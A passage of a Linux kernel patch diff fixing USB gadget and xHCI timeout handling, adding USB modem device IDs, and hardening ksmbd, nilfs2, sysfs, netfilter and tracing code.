+--- a/drivers/usb/gadget/function/f_ncm.c
++++ b/drivers/usb/gadget/function/f_ncm.c
+@@ -884,7 +884,7 @@ static int ncm_set_alt(struct usb_function *f, unsigned intf, unsigned alt)
+ 		if (alt > 1)
+ 			goto fail;
+ 
+-		if (ncm->port.in_ep->enabled) {
++		if (ncm->netdev) {
+ 			DBG(cdev, "reset ncm\n");
+ 			ncm->netdev = NULL;
+ 			gether_disconnect(&ncm->port);
+@@ -1369,7 +1369,7 @@ static void ncm_disable(struct usb_function *f)
+ 
+ 	DBG(cdev, "ncm deactivated\n");
+ 
+-	if (ncm->port.in_ep->enabled) {
++	if (ncm->netdev) {
+ 		ncm->netdev = NULL;
+ 		gether_disconnect(&ncm->port);
+ 	}
+diff --git a/drivers/usb/host/pci-quirks.c b/drivers/usb/host/pci-quirks.c
+index ef08d68b97149..2665832f9addf 100644
+--- a/drivers/usb/host/pci-quirks.c
++++ b/drivers/usb/host/pci-quirks.c
+@@ -207,8 +207,7 @@ EXPORT_SYMBOL_GPL(sb800_prefetch);
+ static void usb_amd_find_chipset_info(void)
+ {
+ 	unsigned long flags;
+-	struct amd_chipset_info info;
+-	info.need_pll_quirk = false;
++	struct amd_chipset_info info = { };
+ 
+ 	spin_lock_irqsave(&amd_lock, flags);
+ 
+@@ -218,7 +217,6 @@ static void usb_amd_find_chipset_info(void)
+ 		spin_unlock_irqrestore(&amd_lock, flags);
+ 		return;
+ 	}
+-	memset(&info, 0, sizeof(info));
+ 	spin_unlock_irqrestore(&amd_lock, flags);
+ 
+ 	if (!amd_chipset_sb_type_init(&info)) {
+diff --git a/drivers/usb/host/xhci-mem.c b/drivers/usb/host/xhci-mem.c
+index 019dcbe55dbdc..62808c98713ec 100644
+--- a/drivers/usb/host/xhci-mem.c
++++ b/drivers/usb/host/xhci-mem.c
+@@ -1752,6 +1752,8 @@ struct xhci_command *xhci_alloc_command(struct xhci_hcd *xhci,
+ 	}
+ 
+ 	command->status = 0;
++	/* set default timeout to 5000 ms */
++	command->timeout_ms = XHCI_CMD_DEFAULT_TIMEOUT;
+ 	INIT_LIST_HEAD(&command->cmd_list);
+ 	return command;
+ }
+diff --git a/drivers/usb/host/xhci-ring.c b/drivers/usb/host/xhci-ring.c
+index 239b5edee3268..4a039e42694bc 100644
+--- a/drivers/usb/host/xhci-ring.c
++++ b/drivers/usb/host/xhci-ring.c
+@@ -332,9 +332,10 @@ void xhci_ring_cmd_db(struct xhci_hcd *xhci)
+ 	readl(&xhci->dba->doorbell[0]);
+ }
+ 
+-static bool xhci_mod_cmd_timer(struct xhci_hcd *xhci, unsigned long delay)
++static bool xhci_mod_cmd_timer(struct xhci_hcd *xhci)
+ {
+-	return mod_delayed_work(system_wq, &xhci->cmd_timer, delay);
++	return mod_delayed_work(system_wq, &xhci->cmd_timer,
++			msecs_to_jiffies(xhci->current_cmd->timeout_ms));
+ }
+ 
+ static struct xhci_command *xhci_next_queued_cmd(struct xhci_hcd *xhci)
+@@ -378,7 +379,7 @@ static void xhci_handle_stopped_cmd_ring(struct xhci_hcd *xhci,
+ 	if ((xhci->cmd_ring->dequeue != xhci->cmd_ring->enqueue) &&
+ 	    !(xhci->xhc_state & XHCI_STATE_DYING)) {
+ 		xhci->current_cmd = cur_cmd;
+-		xhci_mod_cmd_timer(xhci, XHCI_CMD_DEFAULT_TIMEOUT);
++		xhci_mod_cmd_timer(xhci);
+ 		xhci_ring_cmd_db(xhci);
+ 	}
+ }
+@@ -1762,7 +1763,7 @@ static void handle_cmd_completion(struct xhci_hcd *xhci,
+ 	if (!list_is_singular(&xhci->cmd_list)) {
+ 		xhci->current_cmd = list_first_entry(&cmd->cmd_list,
+ 						struct xhci_command, cmd_list);
+-		xhci_mod_cmd_timer(xhci, XHCI_CMD_DEFAULT_TIMEOUT);
++		xhci_mod_cmd_timer(xhci);
+ 	} else if (xhci->current_cmd == cmd) {
+ 		xhci->current_cmd = NULL;
+ 	}
+@@ -4339,7 +4340,7 @@ static int queue_command(struct xhci_hcd *xhci, struct xhci_command *cmd,
+ 	/* if there are no other commands queued we start the timeout timer */
+ 	if (list_empty(&xhci->cmd_list)) {
+ 		xhci->current_cmd = cmd;
+-		xhci_mod_cmd_timer(xhci, XHCI_CMD_DEFAULT_TIMEOUT);
++		xhci_mod_cmd_timer(xhci);
+ 	}
+ 
+ 	list_add_tail(&cmd->cmd_list, &xhci->cmd_list);
+diff --git a/drivers/usb/host/xhci.c b/drivers/usb/host/xhci.c
+index 565aba6b99860..27e01671d3865 100644
+--- a/drivers/usb/host/xhci.c
++++ b/drivers/usb/host/xhci.c
+@@ -4170,12 +4170,18 @@ int xhci_alloc_dev(struct usb_hcd *hcd, struct usb_device *udev)
+ 	return 0;
+ }
+ 
+-/*
+- * Issue an Address Device command and optionally send a corresponding
+- * SetAddress request to the device.
++/**
++ * xhci_setup_device - issues an Address Device command to assign a unique
++ *			USB bus address.
++ * @hcd: USB host controller data structure.
++ * @udev: USB dev structure representing the connected device.
++ * @setup: Enum specifying setup mode: address only or with context.
++ * @timeout_ms: Max wait time (ms) for the command operation to complete.
++ *
++ * Return: 0 if successful; otherwise, negative error code.
+  */
+ static int xhci_setup_device(struct usb_hcd *hcd, struct usb_device *udev,
+-			     enum xhci_setup_dev setup)
++			     enum xhci_setup_dev setup, unsigned int timeout_ms)
+ {
+ 	const char *act = setup == SETUP_CONTEXT_ONLY ? "context" : "address";
+ 	unsigned long flags;
+@@ -4232,6 +4238,7 @@ static int xhci_setup_device(struct usb_hcd *hcd, struct usb_device *udev,
+ 	}
+ 
+ 	command->in_ctx = virt_dev->in_ctx;
++	command->timeout_ms = timeout_ms;
+ 
+ 	slot_ctx = xhci_get_slot_ctx(xhci, virt_dev->in_ctx);
+ 	ctrl_ctx = xhci_get_input_control_ctx(virt_dev->in_ctx);
+@@ -4358,14 +4365,16 @@ static int xhci_setup_device(struct usb_hcd *hcd, struct usb_device *udev,
+ 	return ret;
+ }
+ 
+-static int xhci_address_device(struct usb_hcd *hcd, struct usb_device *udev)
++static int xhci_address_device(struct usb_hcd *hcd, struct usb_device *udev,
++			       unsigned int timeout_ms)
+ {
+-	return xhci_setup_device(hcd, udev, SETUP_CONTEXT_ADDRESS);
++	return xhci_setup_device(hcd, udev, SETUP_CONTEXT_ADDRESS, timeout_ms);
+ }
+ 
+ static int xhci_enable_device(struct usb_hcd *hcd, struct usb_device *udev)
+ {
+-	return xhci_setup_device(hcd, udev, SETUP_CONTEXT_ONLY);
++	return xhci_setup_device(hcd, udev, SETUP_CONTEXT_ONLY,
++				 XHCI_CMD_DEFAULT_TIMEOUT);
+ }
+ 
+ /*
+diff --git a/drivers/usb/host/xhci.h b/drivers/usb/host/xhci.h
+index fc25a5b09710c..fa9e87141e0bf 100644
+--- a/drivers/usb/host/xhci.h
++++ b/drivers/usb/host/xhci.h
+@@ -815,6 +815,8 @@ struct xhci_command {
+ 	struct completion		*completion;
+ 	union xhci_trb			*command_trb;
+ 	struct list_head		cmd_list;
++	/* xHCI command response timeout in milliseconds */
++	unsigned int			timeout_ms;
+ };
+ 
+ /* drop context bitmasks */
+@@ -1574,8 +1576,11 @@ struct xhci_td {
+ 	unsigned int		num_trbs;
+ };
+ 
+-/* xHCI command default timeout value */
+-#define XHCI_CMD_DEFAULT_TIMEOUT	(5 * HZ)
++/*
++ * xHCI command default timeout value in milliseconds.
++ * USB 3.2 spec, section 9.2.6.1
++ */
++#define XHCI_CMD_DEFAULT_TIMEOUT	5000
+ 
+ /* command descriptor */
+ struct xhci_cd {
+diff --git a/drivers/usb/serial/option.c b/drivers/usb/serial/option.c
+index 1a3e5a9414f07..b5ee8518fcc78 100644
+--- a/drivers/usb/serial/option.c
++++ b/drivers/usb/serial/option.c
+@@ -255,6 +255,10 @@ static void option_instat_callback(struct urb *urb);
+ #define QUECTEL_PRODUCT_EM061K_LMS		0x0124
+ #define QUECTEL_PRODUCT_EC25			0x0125
+ #define QUECTEL_PRODUCT_EM060K_128		0x0128
++#define QUECTEL_PRODUCT_EM060K_129		0x0129
++#define QUECTEL_PRODUCT_EM060K_12a		0x012a
++#define QUECTEL_PRODUCT_EM060K_12b		0x012b
++#define QUECTEL_PRODUCT_EM060K_12c		0x012c
+ #define QUECTEL_PRODUCT_EG91			0x0191
+ #define QUECTEL_PRODUCT_EG95			0x0195
+ #define QUECTEL_PRODUCT_BG96			0x0296
+@@ -1218,6 +1222,18 @@ static const struct usb_device_id option_ids[] = {
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM060K_128, 0xff, 0xff, 0x30) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM060K_128, 0xff, 0x00, 0x40) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM060K_128, 0xff, 0xff, 0x40) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM060K_129, 0xff, 0xff, 0x30) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM060K_129, 0xff, 0x00, 0x40) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM060K_129, 0xff, 0xff, 0x40) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM060K_12a, 0xff, 0xff, 0x30) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM060K_12a, 0xff, 0x00, 0x40) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM060K_12a, 0xff, 0xff, 0x40) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM060K_12b, 0xff, 0xff, 0x30) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM060K_12b, 0xff, 0x00, 0x40) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM060K_12b, 0xff, 0xff, 0x40) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM060K_12c, 0xff, 0xff, 0x30) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM060K_12c, 0xff, 0x00, 0x40) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM060K_12c, 0xff, 0xff, 0x40) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM061K_LCN, 0xff, 0xff, 0x30) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM061K_LCN, 0xff, 0x00, 0x40) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM061K_LCN, 0xff, 0xff, 0x40) },
+@@ -1360,6 +1376,12 @@ static const struct usb_device_id option_ids[] = {
+ 	  .driver_info = NCTRL(2) | RSVD(3) },
+ 	{ USB_DEVICE_INTERFACE_CLASS(TELIT_VENDOR_ID, 0x1083, 0xff),	/* Telit FE990 (ECM) */
+ 	  .driver_info = NCTRL(0) | RSVD(1) },
++	{ USB_DEVICE_INTERFACE_CLASS(TELIT_VENDOR_ID, 0x10a0, 0xff),	/* Telit FN20C04 (rmnet) */
++	  .driver_info = RSVD(0) | NCTRL(3) },
++	{ USB_DEVICE_INTERFACE_CLASS(TELIT_VENDOR_ID, 0x10a4, 0xff),	/* Telit FN20C04 (rmnet) */
++	  .driver_info = RSVD(0) | NCTRL(3) },
++	{ USB_DEVICE_INTERFACE_CLASS(TELIT_VENDOR_ID, 0x10a9, 0xff),	/* Telit FN20C04 (rmnet) */
++	  .driver_info = RSVD(0) | NCTRL(2) | RSVD(3) | RSVD(4) },
+ 	{ USB_DEVICE(TELIT_VENDOR_ID, TELIT_PRODUCT_ME910),
+ 	  .driver_info = NCTRL(0) | RSVD(1) | RSVD(3) },
+ 	{ USB_DEVICE(TELIT_VENDOR_ID, TELIT_PRODUCT_ME910_DUAL_MODEM),
+@@ -2052,6 +2074,10 @@ static const struct usb_device_id option_ids[] = {
+ 	  .driver_info = RSVD(3) },
+ 	{ USB_DEVICE_INTERFACE_CLASS(LONGCHEER_VENDOR_ID, 0x9803, 0xff),
+ 	  .driver_info = RSVD(4) },
++	{ USB_DEVICE(LONGCHEER_VENDOR_ID, 0x9b05),	/* Longsung U8300 */
++	  .driver_info = RSVD(4) | RSVD(5) },
++	{ USB_DEVICE(LONGCHEER_VENDOR_ID, 0x9b3c),	/* Longsung U9300 */
++	  .driver_info = RSVD(0) | RSVD(4) },
+ 	{ USB_DEVICE(LONGCHEER_VENDOR_ID, ZOOM_PRODUCT_4597) },
+ 	{ USB_DEVICE(LONGCHEER_VENDOR_ID, IBALL_3_5G_CONNECT) },
+ 	{ USB_DEVICE(HAIER_VENDOR_ID, HAIER_PRODUCT_CE100) },
+@@ -2272,15 +2298,29 @@ static const struct usb_device_id option_ids[] = {
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(0x2cb7, 0x010b, 0xff, 0xff, 0x30) },	/* Fibocom FG150 Diag */
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(0x2cb7, 0x010b, 0xff, 0, 0) },		/* Fibocom FG150 AT */
+ 	{ USB_DEVICE_INTERFACE_CLASS(0x2cb7, 0x0111, 0xff) },			/* Fibocom FM160 (MBIM mode) */
++	{ USB_DEVICE_INTERFACE_CLASS(0x2cb7, 0x0115, 0xff),			/* Fibocom FM135 (laptop MBIM) */
++	  .driver_info = RSVD(5) },
+ 	{ USB_DEVICE_INTERFACE_CLASS(0x2cb7, 0x01a0, 0xff) },			/* Fibocom NL668-AM/NL652-EU (laptop MBIM) */
+ 	{ USB_DEVICE_INTERFACE_CLASS(0x2cb7, 0x01a2, 0xff) },			/* Fibocom FM101-GL (laptop MBIM) */
+ 	{ USB_DEVICE_INTERFACE_CLASS(0x2cb7, 0x01a3, 0xff) },			/* Fibocom FM101-GL (laptop MBIM) */
+ 	{ USB_DEVICE_INTERFACE_CLASS(0x2cb7, 0x01a4, 0xff),			/* Fibocom FM101-GL (laptop MBIM) */
+ 	  .driver_info = RSVD(4) },
++	{ USB_DEVICE_INTERFACE_CLASS(0x2cb7, 0x0a04, 0xff) },			/* Fibocom FM650-CN (ECM mode) */
++	{ USB_DEVICE_INTERFACE_CLASS(0x2cb7, 0x0a05, 0xff) },			/* Fibocom FM650-CN (NCM mode) */
++	{ USB_DEVICE_INTERFACE_CLASS(0x2cb7, 0x0a06, 0xff) },			/* Fibocom FM650-CN (RNDIS mode) */
++	{ USB_DEVICE_INTERFACE_CLASS(0x2cb7, 0x0a07, 0xff) },			/* Fibocom FM650-CN (MBIM mode) */
+ 	{ USB_DEVICE_INTERFACE_CLASS(0x2df3, 0x9d03, 0xff) },			/* LongSung M5710 */
+ 	{ USB_DEVICE_INTERFACE_CLASS(0x305a, 0x1404, 0xff) },			/* GosunCn GM500 RNDIS */
+ 	{ USB_DEVICE_INTERFACE_CLASS(0x305a, 0x1405, 0xff) },			/* GosunCn GM500 MBIM */
+ 	{ USB_DEVICE_INTERFACE_CLASS(0x305a, 0x1406, 0xff) },			/* GosunCn GM500 ECM/NCM */
++	{ USB_DEVICE(0x33f8, 0x0104),						/* Rolling RW101-GL (laptop RMNET) */
++	  .driver_info = RSVD(4) | RSVD(5) },
++	{ USB_DEVICE_INTERFACE_CLASS(0x33f8, 0x01a2, 0xff) },			/* Rolling RW101-GL (laptop MBIM) */
++	{ USB_DEVICE_INTERFACE_CLASS(0x33f8, 0x01a3, 0xff) },			/* Rolling RW101-GL (laptop MBIM) */
++	{ USB_DEVICE_INTERFACE_CLASS(0x33f8, 0x01a4, 0xff),			/* Rolling RW101-GL (laptop MBIM) */
++	  .driver_info = RSVD(4) },
++	{ USB_DEVICE_INTERFACE_CLASS(0x33f8, 0x0115, 0xff),			/* Rolling RW135-GL (laptop MBIM) */
++	  .driver_info = RSVD(5) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(OPPO_VENDOR_ID, OPPO_PRODUCT_R11, 0xff, 0xff, 0x30) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(SIERRA_VENDOR_ID, SIERRA_PRODUCT_EM9191, 0xff, 0xff, 0x30) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(SIERRA_VENDOR_ID, SIERRA_PRODUCT_EM9191, 0xff, 0xff, 0x40) },
+diff --git a/fs/nilfs2/dir.c b/fs/nilfs2/dir.c
+index decd6471300b0..760405da852f6 100644
+--- a/fs/nilfs2/dir.c
++++ b/fs/nilfs2/dir.c
+@@ -243,7 +243,7 @@ nilfs_filetype_table[NILFS_FT_MAX] = {
+ 
+ #define S_SHIFT 12
+ static unsigned char
+-nilfs_type_by_mode[S_IFMT >> S_SHIFT] = {
++nilfs_type_by_mode[(S_IFMT >> S_SHIFT) + 1] = {
+ 	[S_IFREG >> S_SHIFT]	= NILFS_FT_REG_FILE,
+ 	[S_IFDIR >> S_SHIFT]	= NILFS_FT_DIR,
+ 	[S_IFCHR >> S_SHIFT]	= NILFS_FT_CHRDEV,
+diff --git a/fs/smb/common/smb2pdu.h b/fs/smb/common/smb2pdu.h
+index a3936ff53d9d0..25383b11d01b9 100644
+--- a/fs/smb/common/smb2pdu.h
++++ b/fs/smb/common/smb2pdu.h
+@@ -699,7 +699,7 @@ struct smb2_close_rsp {
+ 	__le16 StructureSize; /* 60 */
+ 	__le16 Flags;
+ 	__le32 Reserved;
+-	struct_group(network_open_info,
++	struct_group_attr(network_open_info, __packed,
+ 		__le64 CreationTime;
+ 		__le64 LastAccessTime;
+ 		__le64 LastWriteTime;
+diff --git a/fs/smb/server/server.c b/fs/smb/server/server.c
+index 11b201e6ee44b..63b01f7d97031 100644
+--- a/fs/smb/server/server.c
++++ b/fs/smb/server/server.c
+@@ -167,20 +167,17 @@ static void __handle_ksmbd_work(struct ksmbd_work *work,
+ 	int rc;
+ 	bool is_chained = false;
+ 
+-	if (conn->ops->allocate_rsp_buf(work))
+-		return;
+-
+ 	if (conn->ops->is_transform_hdr &&
+ 	    conn->ops->is_transform_hdr(work->request_buf)) {
+ 		rc = conn->ops->decrypt_req(work);
+-		if (rc < 0) {
+-			conn->ops->set_rsp_status(work, STATUS_DATA_ERROR);
+-			goto send;
+-		}
+-
++		if (rc < 0)
++			return;
+ 		work->encrypted = true;
+ 	}
+ 
++	if (conn->ops->allocate_rsp_buf(work))
++		return;
++
+ 	rc = conn->ops->init_rsp_hdr(work);
+ 	if (rc) {
+ 		/* either uid or tid is not correct */
+diff --git a/fs/smb/server/smb2pdu.c b/fs/smb/server/smb2pdu.c
+index c02b1772cb807..34d88425434ab 100644
+--- a/fs/smb/server/smb2pdu.c
++++ b/fs/smb/server/smb2pdu.c
+@@ -534,6 +534,10 @@ int smb2_allocate_rsp_buf(struct ksmbd_work *work)
+ 	if (cmd == SMB2_QUERY_INFO_HE) {
+ 		struct smb2_query_info_req *req;
+ 
++		if (get_rfc1002_len(work->request_buf) <
++		    offsetof(struct smb2_query_info_req, OutputBufferLength))
++			return -EINVAL;
++
+ 		req = smb2_get_msg(work->request_buf);
+ 		if ((req->InfoType == SMB2_O_INFO_FILE &&
+ 		     (req->FileInfoClass == FILE_FULL_EA_INFORMATION ||
+diff --git a/fs/smb/server/vfs.c b/fs/smb/server/vfs.c
+index fe2c80ea2e47e..a4c99ec38faca 100644
+--- a/fs/smb/server/vfs.c
++++ b/fs/smb/server/vfs.c
+@@ -746,10 +746,15 @@ int ksmbd_vfs_rename(struct ksmbd_work *work, const struct path *old_path,
+ 		goto out4;
+ 	}
+ 
++	/*
++	 * explicitly handle the file overwrite case, for compatibility with
++	 * filesystems that may not support rename flags (e.g. fuse)
++	 */
+ 	if ((flags & RENAME_NOREPLACE) && d_is_positive(new_dentry)) {
+ 		err = -EEXIST;
+ 		goto out4;
+ 	}
++	flags &= ~(RENAME_NOREPLACE);
+ 
+ 	if (old_child == trap) {
+ 		err = -EINVAL;
+diff --git a/fs/sysfs/file.c b/fs/sysfs/file.c
+index a12ac0356c69c..f21e73d107249 100644
+--- a/fs/sysfs/file.c
++++ b/fs/sysfs/file.c
+@@ -450,6 +450,8 @@ struct kernfs_node *sysfs_break_active_protection(struct kobject *kobj,
+ 	kn = kernfs_find_and_get(kobj->sd, attr->name);
+ 	if (kn)
+ 		kernfs_break_active_protection(kn);
++	else
++		kobject_put(kobj);
+ 	return kn;
+ }
+ EXPORT_SYMBOL_GPL(sysfs_break_active_protection);
+diff --git a/include/linux/bootconfig.h b/include/linux/bootconfig.h
+index ca73940e26df8..4195444ec45d1 100644
+--- a/include/linux/bootconfig.h
++++ b/include/linux/bootconfig.h
+@@ -287,7 +287,12 @@ int __init xbc_init(const char *buf, size_t size, const char **emsg, int *epos);
+ int __init xbc_get_info(int *node_size, size_t *data_size);
+ 
+ /* XBC cleanup data structures */
+-void __init xbc_exit(void);
++void __init _xbc_exit(bool early);
++
++static inline void xbc_exit(void)
++{
++	_xbc_exit(false);
++}
+ 
+ /* XBC embedded bootconfig data in kernel */
+ #ifdef CONFIG_BOOT_CONFIG_EMBED
+diff --git a/include/linux/pci.h b/include/linux/pci.h
+index f5d89a4b811f1..4da7411da9baf 100644
+--- a/include/linux/pci.h
++++ b/include/linux/pci.h
+@@ -1383,6 +1383,7 @@ int pci_load_and_free_saved_state(struct pci_dev *dev,
+ 				  struct pci_saved_state **state);
+ int pci_platform_power_transition(struct pci_dev *dev, pci_power_t state);
+ int pci_set_power_state(struct pci_dev *dev, pci_power_t state);
++int pci_set_power_state_locked(struct pci_dev *dev, pci_power_t state);
+ pci_power_t pci_choose_state(struct pci_dev *dev, pm_message_t state);
+ bool pci_pme_capable(struct pci_dev *dev, pci_power_t state);
+ void pci_pme_active(struct pci_dev *dev, bool enable);
+@@ -1553,6 +1554,8 @@ int pci_scan_bridge(struct pci_bus *bus, struct pci_dev *dev, int max,
+ 
+ void pci_walk_bus(struct pci_bus *top, int (*cb)(struct pci_dev *, void *),
+ 		  void *userdata);
++void pci_walk_bus_locked(struct pci_bus *top, int (*cb)(struct pci_dev *, void *),
++			 void *userdata);
+ int pci_cfg_space_size(struct pci_dev *dev);
+ unsigned char pci_bus_max_busnr(struct pci_bus *bus);
+ void pci_setup_bridge(struct pci_bus *bus);
+@@ -1884,6 +1887,8 @@ static inline int pci_save_state(struct pci_dev *dev) { return 0; }
+ static inline void pci_restore_state(struct pci_dev *dev) { }
+ static inline int pci_set_power_state(struct pci_dev *dev, pci_power_t state)
+ { return 0; }
++static inline int pci_set_power_state_locked(struct pci_dev *dev, pci_power_t state)
++{ return 0; }
+ static inline int pci_wake_from_d3(struct pci_dev *dev, bool enable)
+ { return 0; }
+ static inline pci_power_t pci_choose_state(struct pci_dev *dev,
+diff --git a/include/linux/pci_ids.h b/include/linux/pci_ids.h
+index 73cc1e7dd15ad..9e9794d03c9fc 100644
+--- a/include/linux/pci_ids.h
++++ b/include/linux/pci_ids.h
+@@ -158,6 +158,8 @@
+ 
+ #define PCI_VENDOR_ID_LOONGSON		0x0014
+ 
++#define PCI_VENDOR_ID_SOLIDIGM		0x025e
++
+ #define PCI_VENDOR_ID_TTTECH		0x0357
+ #define PCI_DEVICE_ID_TTTECH_MC322	0x000a
+ 
+diff --git a/include/linux/switchtec.h b/include/linux/switchtec.h
+index 48fabe36509ee..8d8fac1626bd9 100644
+--- a/include/linux/switchtec.h
++++ b/include/linux/switchtec.h
+@@ -41,6 +41,7 @@ enum {
+ enum switchtec_gen {
+ 	SWITCHTEC_GEN3,
+ 	SWITCHTEC_GEN4,
++	SWITCHTEC_GEN5,
+ };
+ 
+ struct mrpc_regs {
+diff --git a/include/linux/usb/hcd.h b/include/linux/usb/hcd.h
+index 5a89928ea9534..cd667acf62672 100644
+--- a/include/linux/usb/hcd.h
++++ b/include/linux/usb/hcd.h
+@@ -371,8 +371,9 @@ struct hc_driver {
+ 		 * or bandwidth constraints.
+ 		 */
+ 	void	(*reset_bandwidth)(struct usb_hcd *, struct usb_device *);
+-		/* Returns the hardware-chosen device address */
+-	int	(*address_device)(struct usb_hcd *, struct usb_device *udev);
++		/* Set the hardware-chosen device address */
++	int	(*address_device)(struct usb_hcd *, struct usb_device *udev,
++				  unsigned int timeout_ms);
+ 		/* prepares the hardware to send commands to the device */
+ 	int	(*enable_device)(struct usb_hcd *, struct usb_device *udev);
+ 		/* Notifies the HCD after a hub descriptor is fetched.
+diff --git a/include/linux/usb/quirks.h b/include/linux/usb/quirks.h
+index eeb7c2157c72f..59409c1fc3dee 100644
+--- a/include/linux/usb/quirks.h
++++ b/include/linux/usb/quirks.h
+@@ -72,4 +72,7 @@
+ /* device has endpoints that should be ignored */
+ #define USB_QUIRK_ENDPOINT_IGNORE		BIT(15)
+ 
++/* short SET_ADDRESS request timeout */
++#define USB_QUIRK_SHORT_SET_ADDRESS_REQ_TIMEOUT	BIT(16)
++
+ #endif /* __LINUX_USB_QUIRKS_H */
+diff --git a/include/net/dsa.h b/include/net/dsa.h
+index ee369670e20e4..f96b61d9768e0 100644
+--- a/include/net/dsa.h
++++ b/include/net/dsa.h
+@@ -968,6 +968,14 @@ struct dsa_switch_ops {
+ 			       struct phy_device *phy);
+ 	void	(*port_disable)(struct dsa_switch *ds, int port);
+ 
++	/*
++	 * Compatibility between device trees defining multiple CPU ports and
++	 * drivers that must not default to using the numerically smallest
++	 * CPU port of a switch for its local ports. This can return NULL,
++	 * meaning "don't know/don't care".
++	 */
++	struct dsa_port *(*preferred_default_local_cpu_port)(struct dsa_switch *ds);
++
+ 	/*
+ 	 * Port's MAC EEE settings
+ 	 */
+diff --git a/include/net/netfilter/nf_flow_table.h b/include/net/netfilter/nf_flow_table.h
+index 4a767b3d20b9d..df7775afb92b9 100644
+--- a/include/net/netfilter/nf_flow_table.h
++++ b/include/net/netfilter/nf_flow_table.h
+@@ -335,7 +335,7 @@ int nf_flow_rule_route_ipv6(struct net *net, struct flow_offload *flow,
+ int nf_flow_table_offload_init(void);
+ void nf_flow_table_offload_exit(void);
+ 
+-static inline __be16 nf_flow_pppoe_proto(const struct sk_buff *skb)
++static inline __be16 __nf_flow_pppoe_proto(const struct sk_buff *skb)
+ {
+ 	__be16 proto;
+ 
+@@ -351,6 +351,16 @@ static inline __be16 nf_flow_pppoe_proto(const struct sk_buff *skb)
+ 	return 0;
+ }
+ 
++static inline bool nf_flow_pppoe_proto(struct sk_buff *skb, __be16 *inner_proto)
++{
++	if (!pskb_may_pull(skb, PPPOE_SES_HLEN))
++		return false;
++
++	*inner_proto = __nf_flow_pppoe_proto(skb);
++
++	return true;
++}
++
+ #define NF_FLOW_TABLE_STAT_INC(net, count) __this_cpu_inc((net)->ft.stat->count)
+ #define NF_FLOW_TABLE_STAT_DEC(net, count) __this_cpu_dec((net)->ft.stat->count)
+ #define NF_FLOW_TABLE_STAT_INC_ATOMIC(net, count)	\
+diff --git a/include/trace/events/rpcgss.h b/include/trace/events/rpcgss.h
+index 3f121eed369e8..894d9fc8bd94a 100644
+--- a/include/trace/events/rpcgss.h
++++ b/include/trace/events/rpcgss.h
+@@ -587,7 +587,7 @@ TRACE_EVENT(rpcgss_context,
+ 		__field(unsigned int, timeout)
+ 		__field(u32, window_size)
+ 		__field(int, len)
+-		__string(acceptor, data)
++		__string_len(acceptor, data, len)
+ 	),
+ 
+ 	TP_fast_assign(
+@@ -596,7 +596,7 @@ TRACE_EVENT(rpcgss_context,
+ 		__entry->timeout = timeout;
+ 		__entry->window_size = window_size;
+ 		__entry->len = len;
+-		strncpy(__get_str(acceptor), data, len);
++		__assign_str(acceptor, data);
+ 	),
+ 
+ 	TP_printk("win_size=%u expiry=%lu now=%lu timeout=%u acceptor=%.*s",
+diff --git a/include/uapi/linux/pci_regs.h b/include/uapi/linux/pci_regs.h
+index 57b8e2ffb1dd3..3325155036c80 100644
+--- a/include/uapi/linux/pci_regs.h
++++ b/include/uapi/linux/pci_regs.h
+@@ -1043,6 +1043,7 @@
+ #define  PCI_EXP_DPC_STATUS_INTERRUPT	    0x0008 /* Interrupt Status */
+ #define  PCI_EXP_DPC_RP_BUSY		    0x0010 /* Root Port Busy */
+ #define  PCI_EXP_DPC_STATUS_TRIGGER_RSN_EXT 0x0060 /* Trig Reason Extension */
++#define  PCI_EXP_DPC_RP_PIO_FEP		    0x1f00 /* RP PIO First Err Ptr */
+ 
+ #define PCI_EXP_DPC_SOURCE_ID		 0x0A	/* DPC Source Identifier */
+ 
+diff --git a/init/main.c b/init/main.c
+index ccde19e7275fa..2c339793511b5 100644
+--- a/init/main.c
++++ b/init/main.c
+@@ -633,6 +633,8 @@ static void __init setup_command_line(char *command_line)
+ 	if (!saved_command_line)
+ 		panic("%s: Failed to allocate %zu bytes\n", __func__, len + ilen);
+ 
++	len = xlen + strlen(command_line) + 1;
++
+ 	static_command_line = memblock_alloc(len, SMP_CACHE_BYTES);
+ 	if (!static_command_line)
+ 		panic("%s: Failed to allocate %zu bytes\n", __func__, len);
+diff --git a/io_uring/io_uring.c b/io_uring/io_uring.c
